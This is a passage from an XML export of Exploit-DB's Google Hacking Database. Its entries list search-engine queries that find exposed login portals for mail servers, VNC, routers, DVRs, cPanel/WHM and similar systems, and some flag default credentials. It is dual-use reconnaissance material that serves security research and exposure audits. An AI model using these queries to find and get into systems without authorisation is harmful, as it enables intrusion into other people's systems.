<querystring>https://www.google.com/search?q=intitle:%22VisNetic+WebMail%22+inurl:%22/mail/%22&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>760</id>
<link>https://www.exploit-db.com/ghdb/760</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VitalQIP IP Management System&quot;</shortDescription>
<textualDescription>The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html</textualDescription>
<query>intitle:&quot;VitalQIP IP Management System&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;hl=nl&amp;c2coff=1&amp;q=intitle%3A%22VitalQIP+IP+Management</querystring>
<edb></edb>
<date>2004-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>907</id>
<link>https://www.exploit-db.com/ghdb/907</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VMware Management Interface:&quot; inurl:&quot;vmware/en/&quot;</shortDescription>
<textualDescription>VMware GSX Server is enterprise-class virtual infrastructure software for x86-based servers. It is ideal for server consolidation, disaster recovery and streamlining software development processes.</textualDescription>
<query>intitle:&quot;VMware Management Interface:&quot; inurl:&quot;vmware/en/&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22VMware+Management+Interface%3A%22+inurl%3A%22vmware%2Fen%2F%22</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>3853</id>
<link>https://www.exploit-db.com/ghdb/3853</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VNC Viewer for Java&quot;</shortDescription>
<textualDescription>VNC Viewer for Java
~4N6 Security~</textualDescription>
<query>intitle:&quot;VNC Viewer for Java&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;VNC Viewer for Java&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>820</id>
<link>https://www.exploit-db.com/ghdb/820</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VNC viewer for Java&quot;</shortDescription>
<textualDescription>VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident.</textualDescription>
<query>intitle:&quot;VNC viewer for Java&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22VNC+viewer+for+Java%22</querystring>
<edb></edb>
<date>2005-01-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4240</id>
<link>https://www.exploit-db.com/ghdb/4240</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;VOOD - Welcome to Vood Residential Gateway &gt;Login&quot;</shortDescription>
<textualDescription>Multiple VOOD Online Gateways!
Author: Augusto Pereira
http://www.augustopereira.com.br </textualDescription>
<query>intitle:&quot;VOOD - Welcome to Vood Residential Gateway &gt;Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;VOOD - Welcome to Vood Residential Gateway &gt;Login&quot;</querystring>
<edb></edb>
<date>2016-03-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>7060</id>
<link>https://www.exploit-db.com/ghdb/7060</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Vue Element Admin&quot; intext:&quot;Username : admin&quot; OR intext:&quot;Username : editor&quot; OR intext:&quot;Password : any&quot;</shortDescription>
<textualDescription># Google Dork : intitle:&quot;Vue Element Admin&quot; intext:&quot;Username : admin&quot; OR intext:&quot;Username : editor&quot; OR intext:&quot;Password : any&quot;
# Vue Element Admin login pages with default credentials.
#Author: Naveen Prakaasham K S V
</textualDescription>
<query>intitle:&quot;Vue Element Admin&quot; intext:&quot;Username : admin&quot; OR intext:&quot;Username : editor&quot; OR intext:&quot;Password : any&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Vue Element Admin&quot; intext:&quot;Username : admin&quot; OR intext:&quot;Username : editor&quot; OR intext:&quot;Password : any&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>Naveen Prakaasham</author>
</entry>
<entry>
<id>7173</id>
<link>https://www.exploit-db.com/ghdb/7173</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WATTrouter&quot; &quot;SYSTEM WEB INTERFACE&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WATTrouter&quot; &quot;SYSTEM WEB INTERFACE&quot;
# Various Online Devices
# Date: 04/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;WATTrouter&quot; &quot;SYSTEM WEB INTERFACE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WATTrouter&quot; &quot;SYSTEM WEB INTERFACE&quot;</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7061</id>
<link>https://www.exploit-db.com/ghdb/7061</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;web admin login&quot; &quot;Huawei Technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;web admin login&quot; &quot;Huawei Technologies&quot;
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;web admin login&quot; &quot;Huawei Technologies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;web admin login&quot; &quot;Huawei Technologies&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7124</id>
<link>https://www.exploit-db.com/ghdb/7124</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web Admin login&quot; intext:&quot;Huawei Technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web Admin login&quot; intext:&quot;Huawei Technologies&quot;
# Category: Pages Containing Login Portals
# Date: 06/08/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Web Admin login&quot; intext:&quot;Huawei Technologies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Admin login&quot; intext:&quot;Huawei Technologies&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6716</id>
<link>https://www.exploit-db.com/ghdb/6716</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;web client: login&quot;</shortDescription>
<textualDescription>#Exploit Title :Pages Containing Login portals.
#Google Dork : intitle:&quot;web client: login&quot;
#Date : 4/12/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>intitle:&quot;web client: login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;web client: login&quot;</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6800</id>
<link>https://www.exploit-db.com/ghdb/6800</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WEB LCT&quot; intext:&quot;Web local craft terminal&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;WEB LCT&quot; intext:&quot;Web local craft terminal&quot;</textualDescription>
<query>intitle:&quot;WEB LCT&quot; intext:&quot;Web local craft terminal&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WEB LCT&quot; intext:&quot;Web local craft terminal&quot;</querystring>
<edb></edb>
<date>2021-02-16</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6518</id>
<link>https://www.exploit-db.com/ghdb/6518</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web Login&quot; &quot;For security reasons only authorized users are allowed access to this web server. &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web Login&quot; &quot;For security reasons only authorized
users are allowed access to this web server. &quot;
# Login portals.
# Date: 2/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Web Login&quot; &quot;For security reasons only authorized users are allowed access to this web server. &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Login&quot; &quot;For security reasons only authorized users are allowed access to this web server. &quot;</querystring>
<edb></edb>
<date>2020-09-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5354</id>
<link>https://www.exploit-db.com/ghdb/5354</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web Management Login&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;Web Management Login&quot;
Author: M. Cory Billington
Info: Contains login portals for Brocade switches
</textualDescription>
<query>intitle:&quot;Web Management Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Management Login&quot;</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>7116</id>
<link>https://www.exploit-db.com/ghdb/7116</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WEB SERVICE&quot; &quot;Modify Admin Password&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WEB SERVICE&quot; &quot;Modify Admin Password&quot;
# Pages Containing Login Portals
# Date: 03/08/2021
# Exploit Author: Neha Singh</textualDescription>
<query>intitle:&quot;WEB SERVICE&quot; &quot;Modify Admin Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WEB SERVICE&quot; &quot;Modify Admin Password&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>8024</id>
<link>https://www.exploit-db.com/ghdb/8024</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WEB SERVICE&quot; &quot;wan&quot; &quot;lan&quot; &quot;alarm&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WEB SERVICE&quot; &quot;wan&quot; &quot;lan&quot; &quot;alarm&quot;
# Pages Containing Login Portals
# Date: 14/08/2022
# Exploit Author: Heverin Hacker</textualDescription>
<query>intitle:&quot;WEB SERVICE&quot; &quot;wan&quot; &quot;lan&quot; &quot;alarm&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WEB SERVICE&quot; &quot;wan&quot; &quot;lan&quot; &quot;alarm&quot;</querystring>
<edb></edb>
<date>2022-08-17</date>
<author>Heverin Hacker</author>
</entry>
<entry>
<id>5773</id>
<link>https://www.exploit-db.com/ghdb/5773</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WEB SERVICE&quot; intext:&quot;Please install plugins first!&quot;</shortDescription>
<textualDescription>Multiple Vendor CCTV Login Web Page
intitle:&quot;WEB SERVICE&quot; intext:&quot;Please install plugins first!&quot;
Author : Zulfiqar Wardi (yunaranyancat)</textualDescription>
<query>intitle:&quot;WEB SERVICE&quot; intext:&quot;Please install plugins first!&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WEB SERVICE&quot; intext:&quot;Please install plugins first!&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>yunaranyancat</author>
</entry>
<entry>
<id>6880</id>
<link>https://www.exploit-db.com/ghdb/6880</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web user login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web user login&quot;
# Date: 4/18/2020
# Exploit Author: Javier Bernardo
</textualDescription>
<query>intitle:&quot;Web user login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web user login&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>7102</id>
<link>https://www.exploit-db.com/ghdb/7102</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web Viewer for Samsung DVR&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web Viewer for Samsung DVR&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Web Viewer for Samsung DVR&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Viewer for Samsung DVR&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7103</id>
<link>https://www.exploit-db.com/ghdb/7103</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Web Viewer&quot; inurl:auth_index.htm</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web Viewer&quot; inurl:auth_index.htm
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Web Viewer&quot; inurl:auth_index.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Web Viewer&quot; inurl:auth_index.htm</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>1086</id>
<link>https://www.exploit-db.com/ghdb/1086</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;web-cyradm&quot;|&quot;by Luc de Louw&quot; &quot;This is only for authorized users&quot; -tar.gz -site:web-cyradm.org -johnny.ihackstuff</shortDescription>
<textualDescription>Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO.</textualDescription>
<query>intitle:&quot;web-cyradm&quot;|&quot;by Luc de Louw&quot; &quot;This is only for authorized users&quot; -tar.gz -site:web-cyradm.org -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle:%22web-cyradm%22%7C%22by+Luc+de+Louw%22+%22This+is+only+for+authorized+users%22+-tar.gz+-site:web-cyradm.org+-johnny.ihackstuff&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>7331</id>
<link>https://www.exploit-db.com/ghdb/7331</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;webcam&quot; &quot;login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;webcam&quot; &quot;login&quot;
# Pages Containing Login Portals
# Date:30/09/2021
# Exploit Author: Yash Singh
</textualDescription>
<query>intitle:&quot;webcam&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webcam&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>774</id>
<link>https://www.exploit-db.com/ghdb/774</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WebLogic Server&quot; intitle:&quot;Console Login&quot; inurl:console</shortDescription>
<textualDescription>BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business.</textualDescription>
<query>intitle:&quot;WebLogic Server&quot; intitle:&quot;Console Login&quot; inurl:console</query>
<querystring>https://www.google.com/search?q=intitle:%22WebLogic+Server%22+intitle:%22Console+Login%22+inurl:console</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7095</id>
<link>https://www.exploit-db.com/ghdb/7095</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;weblogic&quot; login intext:&quot;footer powered by&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;weblogic&quot; login intext:&quot;footer powered by&quot;
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;weblogic&quot; login intext:&quot;footer powered by&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;weblogic&quot; login intext:&quot;footer powered by&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7626</id>
<link>https://www.exploit-db.com/ghdb/7626</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;webmail Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;webmail Login&quot;
# Pages Containing Login Portals
# Date:5/11/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;webmail Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webmail Login&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7096</id>
<link>https://www.exploit-db.com/ghdb/7096</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Webmail Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Webmail Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;
# Pages Containing Login Portals
# Date: 23/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intitle:&quot;Webmail Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Webmail Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>3878</id>
<link>https://www.exploit-db.com/ghdb/3878</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WebMail | Powered by Winmail Server - Login&quot; &amp; (intext:&quot;Username&quot; &amp; intext:&quot;Password&quot;)</shortDescription>
<textualDescription>#Summary: Winmail login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;WebMail | Powered by Winmail Server - Login&quot; &amp; (intext:&quot;Username&quot; &amp; intext:&quot;Password&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WebMail | Powered by Winmail Server - Login&quot; &amp; (intext:&quot;Username&quot; &amp; intext:&quot;Password&quot;)</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7018</id>
<link>https://www.exploit-db.com/ghdb/7018</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WebMO Login&quot; inurl:/~webmo/cgi-bin/login.cgi</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WebMO Login&quot; inurl:/~webmo/cgi-bin/login.cgi
# Pages Containing Login Portals.
# Exploit Author: Sarmad Khan</textualDescription>
<query>intitle:&quot;WebMO Login&quot; inurl:/~webmo/cgi-bin/login.cgi</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WebMO Login&quot; inurl:/~webmo/cgi-bin/login.cgi</querystring>
<edb></edb>
<date>2021-07-20</date>
<author>Sarmad Khan</author>
</entry>
<entry>
<id>7001</id>
<link>https://www.exploit-db.com/ghdb/7001</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Webmodule&quot; inurl:&quot;/webmodule-ee/login.seam&quot; &quot;Version&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Webmodule&quot; inurl:&quot;/webmodule-ee/login.seam&quot; &quot;Version&quot;
# Pages Containing Login Portals
# Date: 03/06/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Webmodule&quot; inurl:&quot;/webmodule-ee/login.seam&quot; &quot;Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Webmodule&quot; inurl:&quot;/webmodule-ee/login.seam&quot; &quot;Version&quot;</querystring>
<edb></edb>
<date>2021-06-11</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>5673</id>
<link>https://www.exploit-db.com/ghdb/5673</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WebSite X5 Manager&quot; inurl:/admin/login.php</shortDescription>
<textualDescription>Google Dork: intitle:&quot;WebSite X5 Manager&quot; inurl:/admin/login.php
This dork find some X5 website manager login page.
Berat İşler (root1x)
</textualDescription>
<query>intitle:&quot;WebSite X5 Manager&quot; inurl:/admin/login.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WebSite X5 Manager&quot; inurl:/admin/login.php</querystring>
<edb></edb>
<date>2019-12-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>5690</id>
<link>https://www.exploit-db.com/ghdb/5690</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;webview login&quot; alcatel lucent</shortDescription>
<textualDescription>Alcatel-Lucent devices
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;webview login&quot; alcatel lucent</query>
<querystring>https://www.google.com/search?q=intitle:&quot;webview login&quot; alcatel lucent</querystring>
<edb></edb>
<date>2020-01-10</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>276</id>
<link>https://www.exploit-db.com/ghdb/276</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Welcome Site/User Administrator&quot; &quot;Please select the language&quot; -demos</shortDescription>
<textualDescription>service providers worldwide use Ensim's products to automate the management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro.</textualDescription>
<query>intitle:&quot;Welcome Site/User Administrator&quot; &quot;Please select the language&quot; -demos</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Welcome+Site%2FUser+Administrator%22+%22Please+select+the+language%22+-demos</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1039</id>
<link>https://www.exploit-db.com/ghdb/1039</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Welcome to Mailtraq WebMail&quot;</shortDescription>
<textualDescription>Mailtraq WebMail is just another a web-based e-mail client. This is the login page.</textualDescription>
<query>intitle:&quot;Welcome to Mailtraq WebMail&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Welcome+to+Mailtraq+WebMail%22</querystring>
<edb></edb>
<date>2005-07-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>855</id>
<link>https://www.exploit-db.com/ghdb/855</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;welcome to netware *&quot; -site:novell.com</shortDescription>
<textualDescription>Novell login portals offering various services storage, printing, email or LDAP access</textualDescription>
<query>intitle:&quot;welcome to netware *&quot; -site:novell.com</query>
<querystring>https://www.google.com/search?q=intitle%3A%22welcome+to+netware+*%22+-site%3Anovell.com</querystring>
<edb></edb>
<date>2005-02-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4575</id>
<link>https://www.exploit-db.com/ghdb/4575</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Welcome to QNAP Turbo NAS&quot;</shortDescription>
<textualDescription>Login form and options for QNAP products
Ing. Daniel Maldonado
http://www.caceriadespammers.com.ar/
</textualDescription>
<query>intitle:&quot;Welcome to QNAP Turbo NAS&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome to QNAP Turbo NAS&quot;</querystring>
<edb></edb>
<date>2017-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4195</id>
<link>https://www.exploit-db.com/ghdb/4195</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Welcome | PRTG Network Monitor&quot; inurl:/index.htm</shortDescription>
<textualDescription>Login screen for network monitoring system.
Author: Manuel Mancera (@sinkmanu)</textualDescription>
<query>intitle:&quot;Welcome | PRTG Network Monitor&quot; inurl:/index.htm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome | PRTG Network Monitor&quot; inurl:/index.htm</querystring>
<edb></edb>
<date>2016-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7308</id>
<link>https://www.exploit-db.com/ghdb/7308</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Welcome&quot; intext:&quot;Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Welcome&quot; intext:&quot;Login&quot;
# Pages Containing Login Portals
# Date: 28/09/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;Welcome&quot; intext:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Welcome&quot; intext:&quot;Login&quot;</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7128</id>
<link>https://www.exploit-db.com/ghdb/7128</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WHM Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;WHM Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;
# Pages Containing Login Portals
# Date: 23/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intitle:&quot;WHM Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WHM Login&quot; intext:&quot;cPanel, L.L.C. &quot; +&quot;Change locale&quot;</querystring>
<edb></edb>
<date>2021-08-24</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5672</id>
<link>https://www.exploit-db.com/ghdb/5672</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WHMCS - Login&quot; inurl:/admin/login.php</shortDescription>
<textualDescription>Google Dork : intitle:&quot;WHMCS - Login&quot; inurl:/admin/login.php
This dork finding some useful login page.
Berat İşler (root1x)
</textualDescription>
<query>intitle:&quot;WHMCS - Login&quot; inurl:/admin/login.php</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WHMCS - Login&quot; inurl:/admin/login.php</querystring>
<edb></edb>
<date>2019-12-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>6504</id>
<link>https://www.exploit-db.com/ghdb/6504</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Wimax CPE Configuration&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Wimax CPE Configuration&quot;
# Wimax CPE Configuration portals.
# Date: 30/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Wimax CPE Configuration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Wimax CPE Configuration&quot;</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7105</id>
<link>https://www.exploit-db.com/ghdb/7105</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Wireless router&quot; inurl:login.htm -.com|ca</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Wireless router&quot; inurl:login.htm -.com|ca
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Wireless router&quot; inurl:login.htm -.com|ca</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Wireless router&quot; inurl:login.htm -.com|ca</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4125</id>
<link>https://www.exploit-db.com/ghdb/4125</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Workspace Login&quot; intext:&quot;WinOcular WorkSpace&quot;</shortDescription>
<textualDescription>WinOcular Workspace Login portals.
Decoy</textualDescription>
<query>intitle:&quot;Workspace Login&quot; intext:&quot;WinOcular WorkSpace&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Workspace Login&quot; intext:&quot;WinOcular WorkSpace&quot;</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>968</id>
<link>https://www.exploit-db.com/ghdb/968</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;WorldClient&quot; intext:&quot;© (2003|2004) Alt-N Technologies.&quot;</shortDescription>
<textualDescription>MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs.</textualDescription>
<query>intitle:&quot;WorldClient&quot; intext:&quot;© (2003|2004) Alt-N Technologies.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WorldClient&quot; intext:&quot;© (2003|2004) Alt-N Technologies.&quot;</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1073</id>
<link>https://www.exploit-db.com/ghdb/1073</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;xams 0.0.0..15 - Login&quot;</shortDescription>
<textualDescription>This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15</textualDescription>
<query>intitle:&quot;xams 0.0.0..15 - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22xams+0.0.0..15+-+Login%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-08-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>999</id>
<link>https://www.exploit-db.com/ghdb/999</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;XcAuctionLite&quot; | &quot;DRIVEN BY XCENT&quot; Lite inurl:admin</shortDescription>
